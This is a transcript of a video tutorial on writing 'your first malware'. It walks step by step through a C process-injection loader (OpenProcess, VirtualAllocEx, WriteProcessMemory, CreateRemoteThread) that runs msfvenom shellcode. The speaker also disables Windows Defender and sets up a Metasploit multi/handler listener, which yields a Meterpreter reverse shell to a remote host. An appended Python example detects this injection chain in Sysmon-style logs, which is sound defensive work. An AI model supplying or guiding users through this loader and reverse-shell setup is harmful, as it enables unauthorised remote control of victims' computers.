By the end of this video you will write your first malware and will have enough knowledge to go and explore malware development on your own. Okay, let's start with what you need to know, because when I wanted to write my first malware I was like, what do I need? Is knowing C enough? Because, yeah, you kind of need to know C. And, well, yes, this is enough. You will learn all the other stuff along the way. If you ask me, doing projects is the best way to learn, and not because you actually get to build stuff and not just read about it; it's because you will find a ton of bugs along the way that you will learn to fix, and in general you will stumble upon a lot of knowledge that is not necessarily related to malware development but will be very useful in your cyber security journey. But keep in mind that this video is for educational purposes only, so if you intend to do any harm with software you will write, or even prank your friend, don't do that, turn off the video, it's not for you.

But you still need resources to learn from, so I'm going to give you all that right now. First you want to visit google.com, and no, this is not a joke. Let me show you. For starters you want to ask a question like "what types of malware are there". This time I'm going to answer this question for you, well, at least partially, because as you can see, to cover all of these types this video would have to be like an hour long.

Starting with ransomware, which is probably the most destructive malware out there. It usually exfiltrates and encrypts data inside the company network. The ransomware operator, the person behind the malware, is then asking for money in exchange for the decryption key. If the victim doesn't agree to pay, the operator will most likely publish all the sensitive information they gathered. Then we have info stealers, and the name is pretty self-explanatory: they are used to steal information, credentials for example. They are also a plague and are very likely to come bundled with other malware. The last one I'm going to mention is a botnet, which by itself is a network of zombie computers. A special malware is traveling through hundreds of thousands or even millions of machines, infecting them. It talks with a command and control server and does whatever it is told to do.

Now pick one that seems cool to you. I think I started with a simple ransomware or a stealer, but for both of them I actually have videos on my YouTube channel, so check them out, link in the description. Let's say you want to go with ransomware. Research again: what is ransomware, how ransomware works, what is encryption, what types of encryption are out there, what types of encryption are used by ransomware, what are the biggest ransomware groups, how to reverse engineer a ransomware, or maybe watch reverse engineering videos of some popular ransomware so you know how they look inside, how they are built.

Okay, so I've done like maybe 2 minutes of Google searches and I already came across all these articles and YouTube videos. This one, for example, teaches you about common encryption algorithms, and this one shows you how to use a hybrid encryption scheme, which is a combination of AES and RSA. This is what I'm talking about in my ransomware video, again check it out, link in the description. And this guy even provides code snippets for you, so this is super detailed. You have external links, so like seven maybe, I didn't count, more articles you can read. A reverse engineering one: WannaCry is one of the most popular, I think I can say this, ransomwares. I've also done a video about reverse engineering WannaCry, but this is an article that describes it, so you can see how the ransomware looks inside. There are more reverse engineering articles, and more reverse engineering articles. How ransomware works: you have an article here describing some statistics, examples of different ransomware groups you can research. You have all these YouTube videos about reverse engineering ransomware, from a lot of great content creators. So the knowledge is there; the key is to learn how to do proper research. That's what I want you primarily to get from this video.

Now I want to show you this website called vx-underground. This is the biggest collection of malware samples on the internet, but not only malware samples; they also have this folder called Papers. If you click there you can see articles about malware development, malware analysis and pretty much everything related to malware. Let's go to the Windows catalog, and here you can see all the categories, for example persistence. Open the persistence catalog and you see all of these articles, 36 files about how to make malware persistent and different techniques involving persistence. So you have plenty of knowledge here, from the most beginner friendly stuff to the super advanced stuff that I'm not even touching, because it's far out of reach for me right now; in the future, maybe, we'll see.

You also need to have some knowledge about how Windows works, or whatever OS you are targeting. Again, plenty of resources online, just Google something like "Windows internals", although there is this one book that I can recommend. It is called Windows Internals, Part 1. It is very detailed and describes pretty much everything you will ever need in terms of how Windows is built. And I almost forgot to mention that I have a fresh series on my channel about Windows internals, so definitely go check it out, link in the description.

Okay, so once you know what you want to build, the next thing is to learn how to do it. For Windows malware the most essential library is windows.h. It gives you access to Windows API functions, which allow you to communicate with the Windows operating system. There is this amazing website called MSDN, or Microsoft documentation. Almost every function in the Windows API is present there and well documented, so that it is easy to use them.

But in the beginning of this video I promised that you will build your first malware today, and I'm going to keep this promise, so open up Visual Studio and let's write some code. Our malware will use a technique called process injection to execute a malicious payload inside another process. To do that we need a malicious payload first. We'll generate it with an msfvenom command inside Kali Linux; copy this from the description of the video, hit enter, wait a couple of seconds and you will be greeted with this shellcode. So copy it, go to Visual Studio and paste it into the main function. Let me name it payload, like this. All right, what we're going to do next is use the functions from the windows.h library, as I talked about earlier.

Okay, maybe first let's create a variable called pid that will hold a process ID. If you don't know how processes work, I have a video about them on my channel, so go check it out before going further. We want to get the process ID of the target process, basically an ID of the target process, so we will be able to specify, just for our debugging purposes, which process we want to target. Now we want to get a handle to this process. We will use the OpenProcess function. We want to have all access to this process, so we specify PROCESS_ALL_ACCESS as the first parameter, the second parameter is FALSE, and the last parameter is pid, which is our process ID. Okay, so let's add a simple if statement: if hProcess is equal to NULL we want to print an error, let's say "error OpenProcess", something like this, and return 1.

All right, so the next thing is an LPVOID buffer. We want to allocate some memory inside this process so that we can later copy this shellcode to this memory. So we're going to use the VirtualAllocEx function for this. The first parameter is going to be the handle to our process, then we pass NULL here, then we pass the size of our payload + 1, then we specify the allocation type. You want to specify here MEM_RESERVE and MEM_COMMIT, and PAGE_EXECUTE_READWRITE. Now what does it even mean? MEM_RESERVE means that we are reserving a range of virtual addresses inside the memory of this process, and MEM_COMMIT means that we are assigning these virtual addresses to physical addresses. Okay, this whole mapping thing is going on when we type MEM_COMMIT here: we are committing this virtual region that we reserved before. Basically, you need to know the concept of virtual memory for this. I don't want to get into that in this video, there are plenty of tutorials on YouTube for this, just type "virtual memory" and you will have a bunch of people explaining how this works. Maybe I will make a video about it someday, I don't know. I have a video about processes and process internals right now, you are also welcome to check it out. But yeah, that's basically a very short explanation of how this works. And PAGE_EXECUTE_READWRITE is here because we want to be able to execute the code that is inside this memory. So again, a simple if statement: if buffer is equal to NULL, let's printf an error, "error VirtualAllocEx", like this, and return 1.

All right, so once we have allocated some memory, we want to then write to this memory with the WriteProcessMemory function. It takes hProcess as the first parameter, then it takes our buffer that we just allocated, then it takes payload, which is what we want to write inside this buffer, then the size of this payload, and NULL as the last parameter. By the way, if you have any problems with these parameters, you are not sure if you understand them, let's say you don't understand the WriteProcessMemory function, right, what do you do? You open a new tab, you type "Microsoft documentation WriteProcessMemory", search for it, here it is, well documented, every parameter described with the values that can be specified, even with some examples. So yeah, basically everything is there, you just need to Google it, and that's, once again, the main point of this video, basically to show you that you just need to do research. Without research, without the ability to search for information, you won't learn anything. So WriteProcessMemory like this, okay, return 1. So again we wrap this WriteProcessMemory function in an if statement so that we know if this was successful or not. Of course a real malware wouldn't have this, but it's just a good thing to do while you are writing code, basically; it's easier to debug possible problems.

Now, HANDLE hThread: we are going to call the function that will actually run this code, CreateRemoteThread, with hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) buffer, and then NULL, 0, NULL. Once again, this is your first malware, so you probably have no idea what this means. So what do you do? I'm going to keep repeating this: you open a new tab, you paste this function, you see the first link that comes up, this is the Microsoft documentation once again, and you have all of this described. Of course, you are welcome to ask me questions in the comments or add me on Discord and there we can talk; I will help you with any problems you have with this code. But basically this should answer all your questions, and if you are not sure, then ask me.

The next thing would be to write an if statement again: if this hThread handle is not null, then you want to print this error message that something went wrong, "error CreateRemoteThread", and return 1. printf, I misspelled it. And the last one is WaitForSingleObject. We don't want our code to just finish working, we want it to stay present, we don't want it to finish its own process, because we need it running, basically because this is a reverse shell. I think I forgot to mention it in the beginning: this is going to give us remote access to the machine that you run this code on. Of course it will not bypass any antivirus, so don't expect it to work out of the box; you will need to disable Windows Defender, which I'm going to do right now. Let me quickly do that: you go here, you go to Manage settings, and turn Real-time protection off. Okay, you saw a black screen for a second, but that's all right.

Now let's go back to Kali Linux, because we are finally ready to test it. To do that you want to open msfconsole this time. Wait a second for it to load. Now type, wait, can I zoom it in a little bit: use multi/handler. Options: you have all these options, and you actually should have more. Let me copy the payload that we used, because you need to specify the payload first. You're going to do it like this: set payload to this. My terminal broke, but that's okay. Options one more time. What do we need? We need the LHOST, so set LHOST 192.168.0.13. This is the IP of Kali Linux, so just type this IP. If you don't know what the IP of your Kali machine is, just type ifconfig, am I right? Yes, ifconfig, and one of these interfaces will be correct, depending on your network configuration of course, but I'm sure you will figure it out. What else do we need to set up? EXITFUNC: set EXITFUNC to thread, like this, and we should be good to go. So now run, and it will listen for incoming connections.

Go back to Visual Studio; we should be able to run it with no errors. Yes, it built successfully. Okay, it asks us for a PID, so let me open up Notepad and Process Hacker to determine the PID of Notepad. Of course you can do it with Task Manager, but I just... oh, very nice PID actually, 404, very nice. So 404 and press enter, and as you can see it is hanging, it is not closing our application, it is actually right here on WaitForSingleObject. And if you go back to Kali Linux you have this Meterpreter session. You can type shell, whoami: Utopia Amy, this is my PC name and username. So congratulations, you did it, you wrote your first malware. I hope you were following along, and if you didn't, then this code is in my GitHub, link in the description. And yeah, congrats, from this you can only go forward with your journey. Thanks for sticking to the end. If you have any questions write them down in the comments, and if you enjoyed the video leave a like, subscribe and see you soon.
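As an added example (not the video's code), here is how a defender would spot the chain the video builds, a PROCESS_ALL_ACCESS handle to a process followed by a remote thread started in memory that no loaded module backs, and the outbound connection from the injected process, in Sysmon-style events. The log lines, the injector path and the simplified key=value field layout are constructed for this example; 404 and 192.168.0.13 are the Notepad PID and the listener address used in the video.

```python
"""Detect the OpenProcess -> VirtualAllocEx -> WriteProcessMemory ->
CreateRemoteThread chain in Sysmon-style events (added example; the log
lines below are constructed, not real telemetry)."""
import re
from collections import defaultdict

PROCESS_ALL_ACCESS = 0x1FFFFF  # the access mask the video hands to OpenProcess

# Constructed events, one "key=value" record per line.
# Sysmon IDs: 10 = ProcessAccess, 8 = CreateRemoteThread, 3 = NetworkConnect.
SAMPLE_LOG = r"""
EventID=10 SourceImage=C:\Users\user\injector.exe TargetImage=C:\Windows\System32\notepad.exe TargetProcessId=404 GrantedAccess=0x1FFFFF
EventID=8 SourceImage=C:\Users\user\injector.exe TargetImage=C:\Windows\System32\notepad.exe TargetProcessId=404 StartAddress=0x1A2B3C40000 StartModule=
EventID=3 Image=C:\Windows\System32\notepad.exe ProcessId=404 DestinationIp=192.168.0.13 DestinationPort=4444
EventID=10 SourceImage=C:\Windows\System32\taskmgr.exe TargetImage=C:\Windows\System32\notepad.exe TargetProcessId=404 GrantedAccess=0x1000
EventID=8 SourceImage=C:\Windows\System32\svchost.exe TargetImage=C:\Windows\System32\svchost.exe TargetProcessId=900 StartAddress=0x7FF6A0001000 StartModule=C:\Windows\System32\ntdll.dll
"""

def parse(line):
    """Turn one 'key=value key=value' record into a dict; empty values are kept."""
    return dict(re.findall(r"(\w+)=(\S*)", line))

def analyze(log_text):
    """Map target PID -> findings, one per suspicious step of the chain."""
    findings = defaultdict(list)
    for line in log_text.strip().splitlines():
        ev = parse(line)
        kind = ev.get("EventID")
        if kind == "10" and int(ev["GrantedAccess"], 16) == PROCESS_ALL_ACCESS:
            findings[ev["TargetProcessId"]].append(
                "PROCESS_ALL_ACCESS handle opened by " + ev["SourceImage"])
        elif kind == "8" and ev["SourceImage"] != ev["TargetImage"] and not ev["StartModule"]:
            # A thread whose start address lies in no loaded module is exactly what
            # VirtualAllocEx + WriteProcessMemory + CreateRemoteThread leaves behind.
            findings[ev["TargetProcessId"]].append(
                "remote thread started in unbacked memory at " + ev["StartAddress"])
        elif kind == "3" and ev["ProcessId"] in findings:
            # Only correlate connections for processes already flagged above.
            findings[ev["ProcessId"]].append(
                "outbound connection to %s:%s" % (ev["DestinationIp"], ev["DestinationPort"]))
    return dict(findings)

def injected_pids(log_text):
    """PIDs showing both the full-access handle and the unbacked remote thread."""
    return sorted(pid for pid, f in analyze(log_text).items()
                  if any("handle" in x for x in f) and any("remote thread" in x for x in f))

if __name__ == "__main__":
    for pid, hits in analyze(SAMPLE_LOG).items():
        print(pid, *hits, sep="\n  ")
```

The benign taskmgr access (0x1000, PROCESS_QUERY_LIMITED_INFORMATION) and the svchost thread that starts inside ntdll.dll are left unflagged, which is the distinction that keeps this rule from firing on every debugger or task manager.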